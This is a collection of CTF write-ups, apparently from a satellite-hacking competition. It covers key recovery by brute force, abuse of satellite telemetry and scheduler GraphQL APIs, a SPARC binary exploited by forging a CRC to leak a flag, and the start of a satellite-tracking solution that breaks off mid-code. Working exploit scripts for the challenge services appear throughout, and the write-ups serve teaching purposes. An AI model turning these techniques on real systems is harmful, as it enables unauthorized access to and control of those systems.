* (k_4 ⊕ k_8) & ~0x3 == 0x94
* (k_5 ⊕ k_9) & ~0x3 == 0x00
* (k_9 ⊕ k_13) & ~0x3 == 0xd0
* (k_10 ⊕ k_14) & ~0x3 == 0x74
* (k_2 ⊕ k_14) & ~0x3 == 0xc8
* (k_3 ⊕ k_15) & ~0x3 == 0xb0
* (k_3 ⊕ k_7) & ~0x3 == 0x20
* (k_5 ⊕ k_12) & ~0x3 == 0xf8
* (k_1 ⊕ k_10) & ~0x3 == 0x80
* (k_6 ⊕ k_15) & ~0x3 == 0x48

The end result is that we were able to reduce 6 bits of key space for each of 9 bytes in the key, reducing it by a total of 54 bits. Combined with the 48 bits we were already given, this means the original 128-bit key space had been reduced all the way to 26 bits, which is more than small enough to bruteforce at this point.

At this point we wrote a script to bruteforce the rest of the bits, trying every possible key to see what the decryption result was. The script checked the result for ASCII printable characters, and if the vast majority of it was, it printed the potential decrypted text. We let it rip, and it quickly found the flag that we were looking for.
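The per-byte enumeration and the plaintext check are the only parts of the brute force that need any thought. Below is a sketch of both. `derive_candidates` lists the 4 possible values of $k_i$ left by one masked relation once $k_j$ is known. `looks_like_text` is the kind of "mostly printable" filter we mean. Both names and the 90% threshold are assumptions for illustration, and the AES decryption call itself (any AES-128 library) is left out.

```python
import string

PRINTABLE = set(string.printable.encode())


def derive_candidates(k_j: int, relation: int) -> list:
    """All k_i with (k_i ^ k_j) & ~0x3 == relation; the 2 low bits stay unknown."""
    return [((k_j ^ relation) & 0xFC) | low for low in range(4)]


def looks_like_text(candidate: bytes, threshold: float = 0.9) -> bool:
    """True if at least `threshold` of the bytes are printable ASCII."""
    if not candidate:
        return False
    printable = sum(byte in PRINTABLE for byte in candidate)
    return printable / len(candidate) >= threshold
```

Chaining `derive_candidates` along the relationships above (k_5 → k_9 → k_13, k_1 → k_10 → k_14, k_3 → k_15 → k_6, and so on) leaves 2 unknown bits per derived byte, plus all 8 bits of k_11.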

SpaceDB

pzero

The last over-the-space update seems to have broken the housekeeping on our satellite. Our satellite’s battery is low and is running out of battery fast. We have a short flyover window to transmit a patch or it’ll be lost forever. The battery level is critical enough that even the task scheduling server has shutdown. Thankfully can be fixed without without any exploit knowledge by using the built in APIs provied by kubOS. Hopefully we can save this one!

Note: When you’re done planning, go to low power mode to wait for the next transmission window

Telemetry Service

Upon connecting to the system we are greeted by the following prompt:

### Welcome to kubOS ###

Initializing System ...

** Welcome to spaceDB **

-------------------------

req_flag_base warn: System is critical. Flag not printed.

critical-tel-check info: Detected new telemetry values.

critical-tel-check info: Checking recently inserted telemetry values.

critical-tel-check info: Checking gps subsystem

critical-tel-check info: gps subsystem: OK

critical-tel-check info: reaction_wheel telemetry check.

critical-tel-check info: reaction_wheel subsystem: OK.

critical-tel-check info: eps telemetry check.

critical-tel-check warn: VIDIODE battery voltage too low.

critical-tel-check warn: Solar panel voltage low

critical-tel-check warn: System CRITICAL.

critical-tel-check info: Position: GROUNDPOINT

critical-tel-check warn: Debug telemetry database running at: 3.19.61.44:15150/tel/graphiql

The final message we receive from the system is that it has a debug telemetry database at http://3.19.61.44:15150/tel/graphiql. Navigating to this webpage, we are unsurprisingly greeted by a GraphiQL web interface for a GraphQL API.

Looking in the documentation explorer provided by the web interface we see we are provided the following mutation and query operations:

Query Operations

ping: String!
telemetry(
    timestampGe: Float
    timestampLe: Float
    subsystem: String
    parameter: String
    parameters: [String!]
    limit: Int
): [Entry!]!
routedTelemetry(
    timestampGe: Float
    timestampLe: Float
    subsystem: String
    parameter: String
    parameters: [String!]
    limit: Int
    output: String!
    compress: Boolean = true
): String!

Mutation Operations

insert(
    timestamp: Float
    subsystem: String!
    parameter: String!
    value: String!
): InsertResponse!
insertBulk(timestamp: Float, entries: [InsertEntry!]!): InsertResponse!
delete(
    timestampGe: Float
    timestampLe: Float
    subsystem: String
    parameter: String
): DeleteResponse!

Inspecting the definition of a telemetry entry we can see that it contains the following fields:

timestamp: Float!

subsystem: String!

parameter: String!

value: String!

Using this information we can create a query to show us all current telemetry information:

{

telemetry{timestamp, subsystem, parameter, value}

}

We can see from the output that one of the parameters is the VIDIODE field that the warning messages told us was too low. The mutation operations suggest that we can insert our own telemetry data. Let’s add our own:

mutation {

insert(subsystem: "eps", parameter: "VIDIODE", value: "100.0") {

success,

errors

}

}

After performing this operation we see some movement back on our terminal screen:

```
critical-tel-check info: Detected new telemetry values.
critical-tel-check info: Checking recently inserted telemetry values.
critical-tel-check info: Checking gps subsystem
critical-tel-check info: gps subsystem: OK
critical-tel-check info: reaction_wheel telemetry check.
critical-tel-check info: reaction_wheel subsystem: OK.
critical-tel-check info: eps telemetry check.
critical-tel-check warn: VIDIODE battery voltage too high.
critical-tel-check warn: Solar panel voltage low
critical-tel-check warn: System CRITICAL.
critical-tel-check info: Position: GROUNDPOINT
...
```

Oh no! Now the value is too high. After playing with the values for a bit, we settled on a value of 7, which netted us the following log messages:

```
critical-tel-check info: Detected new telemetry values.
critical-tel-check info: Checking recently inserted telemetry values.
critical-tel-check info: Checking gps subsystem
critical-tel-check info: gps subsystem: OK
critical-tel-check info: reaction_wheel telemetry check.
critical-tel-check info: reaction_wheel subsystem: OK.
critical-tel-check info: eps telemetry check.
critical-tel-check warn: Solar panel voltage low
critical-tel-check info: eps subsystem: OK
critical-tel-check info: Position: GROUNDPOINT
critical-tel-check warn: System: OK. Resuming normal operations.
critical-tel-check info: Scheduler service comms started successfully at: 3.19.61.44:15219/sch/graphiql
```

Scheduler Service

Progress! The system then provided us with a new GraphQL endpoint. Following the same procedure as last time, we opened the page and began to explore which operations were available to us.

Query Operations

```graphql
ping: String!
activeMode: ScheduleMode
availableModes(name: String): [ScheduleMode!]!
```

Mutation Operations

```graphql
createMode(name: String!): GenericResponse!
removeMode(name: String!): GenericResponse!
activateMode(name: String!): GenericResponse!
safeMode: GenericResponse!

importTaskList(
  name: String!
  path: String!
  mode: String!
): GenericResponse!

removeTaskList(name: String!, mode: String!): GenericResponse!

importRawTaskList(
  name: String!
  mode: String!
  json: String!
): GenericResponse!
```

As in the challenge “Talk To Me Goose”, we noticed that the system voltage kept drifting, which would cause the scheduler service to be disabled. Our immediate workaround was to have our script continuously re-insert a good VIDIODE value while we explored the system.
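The keep-alive can be sketched as a background thread that re-sends the insert on a fixed interval and survives transient errors. This is a variation on the `start_thread` function in our solution script, not the exact code we ran: the `send` callback is a hypothetical stand-in for the HTTP POST, and the `threading.Event` is an addition so the loop can be stopped cleanly.

```python
import threading
import time
from typing import Callable


def start_keepalive(send: Callable[[], None], interval: float, stop: threading.Event) -> threading.Thread:
    """Call send() every `interval` seconds in a daemon thread until `stop` is set."""

    def loop() -> None:
        while not stop.is_set():
            try:
                send()  # e.g. POST the VIDIODE insert mutation
            except Exception:
                pass  # a failed request should not kill the keep-alive
            # Sleep for `interval`, but wake up immediately once stop is set
            stop.wait(interval)

    thread = threading.Thread(target=loop, daemon=True)
    thread.start()
    return thread


# Usage with a fake sender that only records when it was called
calls = []
stop = threading.Event()
worker = start_keepalive(lambda: calls.append(time.monotonic()), interval=0.01, stop=stop)
time.sleep(0.1)
stop.set()
worker.join(timeout=1)
print(f"sent {len(calls)} keep-alive updates")
```

Waiting on the event instead of calling `time.sleep` also keeps the loop from spinning if the request raises, because the pause happens outside the `try` block.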

Using the available query operations and the definitions of their associated types, we constructed the following query to retrieve the available modes:

```graphql
{
  availableModes {
    name
    path
    lastRevised
    active
    schedule {
      filename
      path
      timeImported
      tasks {
        delay
        description
        time
        period
        app {
          name
          args
          config
        }
      }
    }
  }
}
```

This query returns the following data:

```json
{
  "data": {
    "availableModes": [
      {
        "name": "low_power",
        "path": "/challenge/target/release/schedules/low_power",
        "lastRevised": "2020-06-07 08:46:20",
        "active": false,
        "schedule": [
          {
            "filename": "nominal-op",
            "path": "/challenge/target/release/schedules/low_power/nominal-op.json",
            "timeImported": "2020-06-07 08:46:20",
            "tasks": [
              {
                "delay": "5s",
                "description": "Charge battery until ready for transmission.",
                "time": null,
                "period": null,
                "app": {"name": "low_power", "args": null, "config": null}
              },
              {
                "delay": null,
                "description": "Switch into transmission mode.",
                "time": "2020-06-07 09:38:10",
                "period": null,
                "app": {"name": "activate_transmission_mode", "args": null, "config": null}
              }
            ]
          }
        ]
      },
      {
        "name": "safe",
        "path": "/challenge/target/release/schedules/safe",
        "lastRevised": "1970-01-01 00:00:00",
        "active": false,
        "schedule": []
      },
      {
        "name": "station-keeping",
        "path": "/challenge/target/release/schedules/station-keeping",
        "lastRevised": "2020-06-07 08:46:20",
        "active": true,
        "schedule": [
          {
            "filename": "nominal-op",
            "path": "/challenge/target/release/schedules/station-keeping/nominal-op.json",
            "timeImported": "2020-06-07 08:46:20",
            "tasks": [
              {
                "delay": "35s",
                "description": "Update system telemetry",
                "time": null,
                "period": "1m",
                "app": {"name": "update_tel", "args": null, "config": null}
              },
              {
                "delay": "5s",
                "description": "Trigger safemode on critical telemetry values",
                "time": null,
                "period": "5s",
                "app": {"name": "critical_tel_check", "args": null, "config": null}
              },
              {
                "delay": "0s",
                "description": "Prints flag to log",
                "time": null,
                "period": null,
                "app": {"name": "request_flag_telemetry", "args": null, "config": null}
              }
            ]
          }
        ]
      },
      {
        "name": "transmission",
        "path": "/challenge/target/release/schedules/transmission",
        "lastRevised": "2020-06-07 08:46:20",
        "active": false,
        "schedule": [
          {
            "filename": "nominal-op",
            "path": "/challenge/target/release/schedules/transmission/nominal-op.json",
            "timeImported": "2020-06-07 08:46:20",
            "tasks": [
              {
                "delay": null,
                "description": "Orient antenna to ground.",
                "time": "2020-06-07 09:38:20",
                "period": null,
                "app": {"name": "groundpoint", "args": null, "config": null}
              },
              {
                "delay": null,
                "description": "Power-up downlink antenna.",
                "time": "2020-06-07 09:38:40",
                "period": null,
                "app": {"name": "enable_downlink", "args": null, "config": null}
              },
              {
                "delay": null,
                "description": "Power-down downlink antenna.",
                "time": "2020-06-07 09:38:45",
                "period": null,
                "app": {"name": "disable_downlink", "args": null, "config": null}
              },
              {
                "delay": null,
                "description": "Orient solar panels at sun.",
                "time": "2020-06-07 09:38:50",
                "period": null,
                "app": {"name": "sunpoint", "args": null, "config": null}
              }
            ]
          }
        ]
      }
    ]
  }
}
```

Looking through the available “apps”, we see a “request_flag_telemetry” app. Its description is “Prints flag to log.”
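With a response this long, it helps to flatten it into a mapping from mode name to app names. The sketch below walks the `availableModes` response shape shown above; `apps_by_mode` is a hypothetical helper, and `sample` is a trimmed copy of the response, not the full output.

```python
def apps_by_mode(response: dict) -> dict:
    """Map each mode name to the app names in its schedules, in listed order."""
    result = {}
    for mode in response["data"]["availableModes"]:
        result[mode["name"]] = [
            task["app"]["name"]
            for schedule in mode["schedule"]
            for task in schedule["tasks"]
        ]
    return result


# Trimmed copy of the availableModes response above
sample = {
    "data": {
        "availableModes": [
            {"name": "safe", "schedule": []},
            {"name": "station-keeping", "schedule": [{"tasks": [
                {"app": {"name": "update_tel"}},
                {"app": {"name": "critical_tel_check"}},
                {"app": {"name": "request_flag_telemetry"}},
            ]}]},
            {"name": "transmission", "schedule": [{"tasks": [
                {"app": {"name": "groundpoint"}},
                {"app": {"name": "enable_downlink"}},
                {"app": {"name": "disable_downlink"}},
                {"app": {"name": "sunpoint"}},
            ]}]},
        ]
    }
}

for mode, apps in apps_by_mode(sample).items():
    print(f"{mode}: {', '.join(apps) or '(empty)'}")
```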

We also notice that one of the available modes is called “low_power”, and we know from the challenge description that after setting up our tasks we should drop into low power mode. Let’s use the importRawTaskList mutation to modify this mode’s task list so that it also requests the flag, then activate the mode and see what happens:

```graphql
mutation {
  importRawTaskList(name: "nominal-op", mode: "low_power", json: "{\"tasks\": [{\"delay\": \"0s\", \"description\": \"\", \"app\": {\"name\": \"request_flag_telemetry\"}}]}") { success, errors }
}

mutation {
  activateMode(name: "low_power") { success, errors }
}
```
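Hand-escaping the `json` argument is error-prone. Our solution script builds it by calling `json.dumps` twice: the inner call serializes the task list, and the outer call turns that text into a quoted, backslash-escaped string literal. GraphQL accepts the result because its string escapes (`\"`, `\\`, `\n`, `\uXXXX`, and so on) match JSON's. A minimal sketch; `import_raw_task_list_query` is a hypothetical helper name:

```python
import json


def import_raw_task_list_query(name: str, mode: str, task_list: dict) -> str:
    """Build an importRawTaskList mutation with the task list embedded as a string literal."""
    # Inner dumps: task list -> JSON text. Outer dumps: JSON text -> quoted, escaped literal.
    json_literal = json.dumps(json.dumps(task_list))
    return (
        "mutation { importRawTaskList(name: %s, mode: %s, json: %s) { success, errors } }"
        % (json.dumps(name), json.dumps(mode), json_literal)
    )


tasks = {"tasks": [{"delay": "0s", "description": "", "app": {"name": "request_flag_telemetry"}}]}
query = import_raw_task_list_query("nominal-op", "low_power", tasks)
print(query)
```

Because `json.dumps` uses `", "` and `": "` separators by default, the generated `json:` argument is character-for-character the same as the hand-written mutation above.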

Back at the terminal we see the following:

```
Low_power mode enabled.
Timetraveling.
Transmission mode enabled.
WARN: Battery critical.
INFO: Shutting down.
Goodbye
WARN: Could not establish downlink.
ERROR: Downlink: FAILED
WARN: LOW battery.
Shutting down...
Goodbye.
```

Dang. Not enough power and we can’t establish a downlink…

Looking back at the mode listing, we see an app named “sunpoint” in the transmission schedule, with the description “Orient solar panels at sun.” That sounds like it will give us some power!

Using the importRawTaskList mutation, let’s try adding a task to low_power mode that runs that app before anything else. To do this we used the following mutation:

```graphql
mutation {
  importRawTaskList(name: "nominal-op", mode: "low_power", json: "{\"tasks\": [{\"delay\": \"0s\", \"description\": \"\", \"app\": {\"name\": \"sunpoint\"}}]}") { success, errors }
}
```

After modifying the low_power task list and activating the mode, we are greeted with the following messages in the terminal:

```
Low_power mode enabled.
Timetraveling.
sunpoint info: Adjusting to sunpoint...
sunpoint info: [2020-06-07 09:07:24] Sunpoint panels: SUCCESS
Transmission mode enabled.
INFO: Adjusting to groundpoint...
INFO: Pointing at ground: SUCCESS
INFO: Powering-up antenna
WARN: No data to transmit
INFO: Powering-down antenna
INFO: Downlink disable: SUCCESS
INFO: Adjusting to sunpoint...
INFO: Sunpoint panels: SUCCESS
Goodbye
```

So close! The message “No data to transmit”, combined with the earlier failure to transmit the flag because the system “Could not establish downlink”, made it clear what we had to do: the flag has to be requested while the downlink antenna is powered up.

We can see from the transmission task configuration that it calls enable_downlink at 2020-06-07 09:38:40 and calls disable_downlink at 2020-06-07 09:38:45. To solve this challenge we can simply add a request_flag_telemetry call in between those two tasks.
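The splice can be sketched with plain datetime arithmetic: find the `enable_downlink` task, schedule `request_flag_telemetry` a couple of seconds later, and check that it still lands before `disable_downlink`. This is a simplified, offline version of what `splice_in_flag_during_transmission` in our script does; the two-second offset is the one our script used, the task dicts are trimmed from the listing above, and `find_time` and `splice_flag_task` are hypothetical names.

```python
from datetime import datetime, timedelta

FMT = "%Y-%m-%d %H:%M:%S"  # timestamp format used in the scheduler's task lists


def find_time(tasks: list, app_name: str) -> datetime:
    """Return the scheduled time of the first task running `app_name`."""
    for task in tasks:
        if task["app"]["name"] == app_name:
            return datetime.strptime(task["time"], FMT)
    raise KeyError(app_name)


def splice_flag_task(tasks: list, offset_s: int = 2) -> list:
    """Return a copy of `tasks` with request_flag_telemetry inside the downlink window."""
    start = find_time(tasks, "enable_downlink")
    end = find_time(tasks, "disable_downlink")
    flag_time = start + timedelta(seconds=offset_s)
    if not start < flag_time < end:
        raise ValueError("offset does not fit inside the downlink window")
    flag_task = {"delay": None, "description": "", "time": flag_time.strftime(FMT),
                 "app": {"name": "request_flag_telemetry"}}
    return tasks + [flag_task]


transmission_tasks = [
    {"time": "2020-06-07 09:38:20", "app": {"name": "groundpoint"}},
    {"time": "2020-06-07 09:38:40", "app": {"name": "enable_downlink"}},
    {"time": "2020-06-07 09:38:45", "app": {"name": "disable_downlink"}},
    {"time": "2020-06-07 09:38:50", "app": {"name": "sunpoint"}},
]
new_tasks = splice_flag_task(transmission_tasks)
print(new_tasks[-1]["time"])
```

Using `timedelta` rather than editing the seconds digits keeps the timestamp valid even when the window straddles a minute boundary.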

After doing this we are greeted with the following messages in the terminal:

```
Low_power mode enabled.
Timetraveling.
sunpoint info: Adjusting to sunpoint...
sunpoint info: [2020-06-07 09:34:49] Sunpoint panels: SUCCESS
Transmission mode enabled.
Pointing to ground.
Transmitting...
----- Downlinking -----
Recieved flag.
flag{india3201lima:GKbgdAip65qzFQnnM7fZ0jPhtGgyiNPpKJ5xYJvTM2Lp6ALc2FSqxX1FMqfVm0zauGlqcyn8LMYTW48X_03bX3g}
Downlink disabled.
Adjusting to sunpoint...
Sunpoint: TRUE
Goodbye
```

Solution

The solution script that performed all this is below.

```python
from pwn import *  # star import first so the explicit imports below take precedence

import json
import threading
import time
from datetime import timedelta

import dateutil.parser
import requests

host = 'spacedb.satellitesabove.me'
port = 5062
ticket = 'ticket{india3201lima:GHctMS4q4RgTvZO_LnWYOLLHRrE9m6IzgfRQ7OC5nhtXsa1cEpJL7FGU4aQVL80t0w}'

r = remote(host, port)
r.recvuntil("Ticket please:\n")
r.sendline(ticket)

prompt = r.recvuntil("Debug telemetry database running at: ").decode()
tel_url_line = r.recvline().decode()
print(prompt + tel_url_line)
tel_url = "http://" + tel_url_line.rstrip()


def start_thread(url):
    # Keep re-inserting a healthy VIDIODE value so critical_tel_check
    # does not drop the system back into safe mode
    while True:
        try:
            requests.post(url,
                          json={"query": "mutation { insert(subsystem: \"eps\", parameter: \"VIDIODE\", value: \"7.0\") { success, errors }}",
                                "variables": None},
                          headers={"Referer": url})
        except Exception:
            pass
        time.sleep(1)  # outside the try, so errors cannot make the loop spin


t = threading.Thread(target=start_thread, args=(tel_url,), daemon=True)
t.start()

prompt = r.recvuntil("Scheduler service comms started successfully at: ").decode()
sch_url_line = r.recvline().decode()
print(prompt + sch_url_line)
sch_url = "http://" + sch_url_line.rstrip()


def add_task(dicts, name, delay, extra=None):
    task_data = {"delay": delay,
                 "description": "",
                 "app": {"name": name}}
    if extra:
        task_data.update(extra)
    dicts["tasks"].append(task_data)


def enable_sunpoint_in_low_power():
    task_dict = {"tasks": []}
    add_task(task_dict, "sunpoint", "0s")
    base_query = "mutation { importRawTaskList(name: \"nominal-op\", mode: \"low_power\", json: %s) { success, errors }}"
    # Serialize twice: once for the task-list JSON, once more to make it a GraphQL string literal
    tasks = json.dumps(json.dumps(task_dict))
    requests.post(sch_url,
                  json={"query": base_query % tasks, "variables": None},
                  headers={"Referer": sch_url})


def get_transmission_task_schedule():
    trans_data = requests.post(sch_url,
                               json={"query": "{availableModes(name:\"transmission\") { schedule{ tasks { time, description, period, delay, app { name, args, config } } } }}",
                                     "variables": None},
                               headers={"Referer": sch_url})
    return trans_data.json()


def get_downlink_enable_time(task_data):
    target_time = None
    for t in task_data['data']['availableModes'][0]['schedule'][0]['tasks']:
        if t['app']['name'] == 'enable_downlink':
            target_time = t['time']
            break
    return target_time


def splice_in_flag_during_transmission():
    task_data = get_transmission_task_schedule()
    target_time = get_downlink_enable_time(task_data)
    base_query = "mutation { importRawTaskList(name: \"nominal-op\", mode: \"transmission\", json: %s) { success, errors }}"
    # Request the flag 2 seconds after the downlink antenna powers up (in our instance,
    # enable at 09:38:40 and disable at 09:38:45); datetime math avoids a ":61" seconds field
    new_time = (dateutil.parser.parse(target_time) + timedelta(seconds=2)).strftime("%Y-%m-%d %H:%M:%S")
    schedule = task_data['data']['availableModes'][0]['schedule'][0]
    add_task(schedule, "request_flag_telemetry", None, extra={"time": new_time})
    tasks = json.dumps(json.dumps(schedule))
    requests.post(sch_url,
                  json={"query": base_query % tasks, "variables": None},
                  headers={"Referer": sch_url})


def activate_mode(mode):
    requests.post(sch_url,
                  json={"query": "mutation { activateMode(name: \"%s\") { success, errors }}" % (mode),
                        "variables": None},
                  headers={"Referer": sch_url})


enable_sunpoint_in_low_power()
splice_in_flag_during_transmission()
activate_mode("low_power")
r.interactive()
```

Sun? On my Sat?

numbers

Description

We've uncovered a strange device listening on a port I've connected you to on our satellite. At one point one of our engineers captured the firmware from it but says he saw it get patched recently. We've tried to communicate with it a couple times, and seems to expect a hex-encoded string of bytes, but all it has ever sent back is complaints about cookies, or something. See if you can pull any valuable information from the device and the cookies we bought to bribe the device are yours!

Reverse Engineering the Binary







We are given a SPARC executable which parses a binary protocol. I had never worked with SPARC before, so this challenge was a cool learning experience. The challenge code is fairly simple, and we were able to rapidly understand “all” of the protocol using Ghidra for decompilation.

If we send a valid authorization header, which includes the cookie and a CRC, we can send commands to the service. There is really only one interesting command: “getFlag” (cmd 3) just aborts, and cmd 2 is a shutdown request. Investigating cmd 1, which is handled by handleGetInfo, we can see that it first “clips” the index value we provide to either 1 or 2, and then returns a string from a table. Interestingly, index 3, which we cannot access directly, is the flag.

Given how little functionality the code has, I decided there must be some way to bypass the clipStrIdx function. While I am not clear on the correct way to handle save/restore in SPARC, I noticed that in the case where the string index is <= 0, the function returns l7 (assumed to be 0), which Ghidra decompiles as a return of the constant 0. Outside of the statically linked libraries, the only other place in the binary that uses l7 is the CRC calculation. I assumed that if we sent a packet whose CRC came out to 3 and requested index 0, the leftover l7 value would be used as the index and we would get the flag. We wasted a significant amount of time because our script had accidentally swapped the CRC Length and CRC Value bytes in the packet, which cost us first blood on this challenge, but ultimately, overwriting the l7 register via the CRC function did work.
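To make the idea concrete, here is a Python model of how we understood clipStrIdx from the decompilation. It is not the binary's code: the exact upper-bound behavior and the table contents are assumptions, and `leftover_l7` stands in for whatever value the l7 register happens to hold when the <= 0 branch returns it.

```python
# Hypothetical string table: 1 and 2 are the normal info strings, 3 is the flag
STRINGS = {0: "<entry 0>", 1: "<info string 1>", 2: "<info string 2>", 3: "flag{...}"}


def clip_str_idx(idx: int, leftover_l7: int) -> int:
    """Model of clipStrIdx as we read it in Ghidra (assumed behavior)."""
    if idx <= 0:
        # Ghidra shows `return 0`, but the binary actually returns l7,
        # which is only 0 if nothing else has written to it
        return leftover_l7
    if idx > 2:
        return 2  # assumed: larger indices are clamped to the last public entry
    return idx


def handle_get_info(idx: int, leftover_l7: int) -> str:
    """Model of handleGetInfo: clip the index, then look up the string."""
    return STRINGS[clip_str_idx(idx, leftover_l7)]


print(handle_get_info(3, leftover_l7=0))  # index 3 is clamped, so no flag
print(handle_get_info(0, leftover_l7=3))  # l7 left at 3 by the CRC code selects the flag
```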

```python
from pwn import *

from binascii import hexlify, unhexlify
import struct

import crc8  # pip install crc8

context.log_level = 'CRITICAL'

ticket = 'ticket{charlie82375mike:GCTG-KMD1hTE7dJWr8Trbb9WNYHXS6I5YHB1fiSzuimbf3r7EEhGRqvqAyWsoPoKVg}'


def connect():
    p = remote("sun.satellitesabove.me", 5043)
    p.recvuntil("please:")
    p.sendline(ticket)
    p.recvuntil("Configuration Server: Running")
    p.readline()
    return p


def createCommand(cmdId, cmdData):
    # Pad the command data to a multiple of 4 bytes
    padding = b""
    requiredPadding = 4 - (len(cmdData) % 4)
    if requiredPadding != 4:
        padding = b"\x00" * requiredPadding
    # Length byte (data + padding + 2 header bytes), command id, data, padding
    msg = p8(len(cmdData) + len(padding) + 2) + p8(cmdId) + cmdData + padding
    assert (len(msg) % 4) != 0, "alignment bad"
    return msg


seqNo = 1

# Inverse of CRC-8 over a single byte: maps each CRC value to the byte producing it
crc_lookup_table = {}
for i in range(256):
    crc_lookup_table[crc8.crc8(bytes([i])).digest()] = bytes([i])


def getForgeBytes(data, desired):
    # Appending the CRC of the data brings the CRC register back to 0...
    crc = crc8.crc8(data).digest()
    data = data + crc
    crc = crc8.crc8(data).digest()
    assert crc[0] == 0
    # ...so one more byte whose single-byte CRC is `desired` leaves exactly `desired`
    data = data + crc_lookup_table[bytes([desired])]
    crc = crc8.crc8(data).digest()
    assert crc[0] == desired
    return data


p = connect()

cookieCommand = unhexlify("0A00")
cookieMessage = unhexlify("53df135f") + struct.pack(">H", seqNo)
fullMsg = cookieMessage

# Value we want the CRC code to leave in l7: the flag's string index
desired = 3

# cmd 1 (handleGetInfo) with index 0, so clipStrIdx takes the "<= 0" path
fullMsg += createCommand(1, p8(0))
fullMsg = getForgeBytes(fullMsg, desired)

# Header, then CRC length, then CRC value (the order we had swapped at first)
fullMsg = cookieCommand + p8(len(fullMsg)) + p8(desired) + fullMsg
finalMsg = struct.pack(">B", len(fullMsg) + 1) + fullMsg
finalMsg = hexlify(finalMsg)

p.sendline(finalMsg)
print(p.readline().decode().strip())
p.close()
```
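The getForgeBytes trick works for any CRC with a zero initial value and no final XOR: appending a message's CRC drives the register back to 0, and from a zero register each single byte maps to a distinct CRC value, so one more byte can select any result. The dependency-free sketch below assumes the `crc8` package's defaults are CRC-8 with polynomial 0x07, initial value 0x00, no reflection and no final XOR (the CRC-8/SMBUS variant); `crc8_update` and `forge` are our own names.

```python
def crc8_update(data: bytes, crc: int = 0x00) -> int:
    """Bitwise CRC-8, polynomial x^8 + x^2 + x + 1 (0x07), MSB first, no final XOR."""
    for byte in data:
        crc ^= byte
        for _ in range(8):
            if crc & 0x80:
                crc = ((crc << 1) ^ 0x07) & 0xFF
            else:
                crc = (crc << 1) & 0xFF
    return crc


# From a zero register each single byte gives a distinct CRC, so this table inverts it
SINGLE_BYTE_INVERSE = {crc8_update(bytes([b])): b for b in range(256)}


def forge(data: bytes, desired: int) -> bytes:
    """Append two bytes so that the CRC of the result equals `desired`."""
    data = data + bytes([crc8_update(data)])  # register is now 0
    assert crc8_update(data) == 0
    return data + bytes([SINGLE_BYTE_INVERSE[desired]])


# Cookie plus sequence number from the script above, forged to a CRC of 3
msg = forge(bytes.fromhex("53df135f0001"), 3)
print(msg.hex(), crc8_update(msg))
```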

Track the Sat

qw3rty01

The main difficulty of this challenge was finding a library to do the heavy lifting for all the required math. We tried a few libraries but ultimately settled on Skyfield, which was able to take all the challenge information and provide a simple API for pulling out the data we needed for the solution.

Description

We have obtained access to the control system for a groundstation's satellite antenna. The azimuth and elevation motors are controlled by PWM signals from the controller. Given a satellite and the groundstation's location and time, we need to control the antenna to track the satellite. The motors accept duty cycles between 2457 and 7372, from 0 to 180 degrees.

Some example control input logs were found on the system. They may be helpful to you to try to reproduce before you take control of the antenna. They seem to be in the format you need to provide. We also obtained a copy of the TLEs in use at this groundstation.

* * * * *

```
Track-a-sat control system
Latitude: 52.5341
Longitude: 85.18
Satellite: PERUSAT 1
Start time GMT: 1586789933.820023
720 observations, one every 1 second
Waiting for your solution followed by a blank line...
```
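Since every connection prints the same banner layout, the parameters can also be pulled out with a single regular expression instead of a chain of `recvuntil` calls. The sketch below runs against the banner text above; the field layout is assumed to match this sample exactly, and `parse_banner` is a hypothetical helper.

```python
import re

BANNER_RE = re.compile(
    r"Latitude: (?P<lat>-?[\d.]+)\s+"
    r"Longitude: (?P<lon>-?[\d.]+)\s+"
    r"Satellite: (?P<sat>.+?)\s*\n\s*"
    r"Start time GMT: (?P<start>[\d.]+)\s+"
    r"(?P<count>\d+) observations, one every (?P<step>\d+) seconds?"
)


def parse_banner(text: str) -> dict:
    """Extract the tracking parameters from the Track-a-sat banner."""
    m = BANNER_RE.search(text)
    if m is None:
        raise ValueError("banner format not recognized")
    return {
        "latitude": float(m["lat"]),
        "longitude": float(m["lon"]),
        "satellite": m["sat"],
        "start_time": float(m["start"]),
        "observations": int(m["count"]),
        "step": int(m["step"]),
    }


banner = """Track-a-sat control system
Latitude: 52.5341
Longitude: 85.18
Satellite: PERUSAT 1
Start time GMT: 1586789933.820023
720 observations, one every 1 second
Waiting for your solution followed by a blank line...
"""
print(parse_banner(banner))
```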

From this, we are able to extract the latitude, longitude, satellite to track, start time, total number of observations, and time resolution. The second piece of information we need is the satellite’s two-line element set (TLE), which was provided in active.txt; for this satellite it contained:

```
PERUSAT 1
1 41770U 16058A   20101.18716824  .00000007  00000-0  11274-4 0  9996
2 41770  98.1796 175.4063 0001340  89.8530 270.2833 14.58559808189802
```
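TLE fields are fixed-width (the sgp4 parser that Skyfield builds on reads them by column position), so a copy-paste that collapses runs of spaces can break parsing. A quick sanity check is the standard TLE checksum: the sum of all digits in the first 68 columns, counting each minus sign as 1, modulo 10, which must equal column 69. A sketch, with `tle_checksum` and `tle_line_ok` as our own helper names and the PERUSAT 1 lines written with their standard column spacing:

```python
def tle_checksum(line: str) -> int:
    """Standard TLE checksum over columns 1-68: digits count as their value, '-' counts as 1."""
    total = 0
    for ch in line[:68]:
        if ch.isdigit():
            total += int(ch)
        elif ch == "-":
            total += 1
    return total % 10


def tle_line_ok(line: str) -> bool:
    """True if the line is 69 columns wide and its last column matches the checksum."""
    return len(line) == 69 and line[68].isdigit() and int(line[68]) == tle_checksum(line)


line1 = "1 41770U 16058A   20101.18716824  .00000007  00000-0  11274-4 0  9996"
line2 = "2 41770  98.1796 175.4063 0001340  89.8530 270.2833 14.58559808189802"
print(tle_line_ok(line1), tle_line_ok(line2))
```

A line that has lost its padding fails the length check even though its checksum digit is still correct.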

Since we assumed that different satellites could be requested (which turned out not to be the case), we created a mapping of all the satellites in active.txt by name:

```python
from skyfield.api import load

satellites = load.tle_file("active.txt")
satellites = {i.name: i for i in satellites}
```

This allows us to access any satellite by using satellites[name].

Next, we need a topocentric position for the ground station’s antenna so that we can compute a vector from it to the satellite:

```python
from skyfield.api import Topos

ground_latitude = 52.5341  # pulled from the socket
ground_longitude = 85.18  # pulled from the socket
groundstation = Topos(ground_latitude, ground_longitude)

satellite = satellites['PERUSAT 1']  # pulled from the socket
satellite_vector = satellite - groundstation
```

Now that we have a vector, we can start pulling out altitude and azimuth information at a specific time:

```python
from datetime import datetime

from skyfield.api import load, utc

timescale = load.timescale()

# Note: datetime.utcfromtimestamp() returns a *naive* datetime (tzinfo=None),
# even though the value is UTC. Skyfield refuses naive datetimes, so the
# tzinfo has to be set to skyfield.api.utc explicitly.
start_time = 1586789933.820023  # pulled from the socket
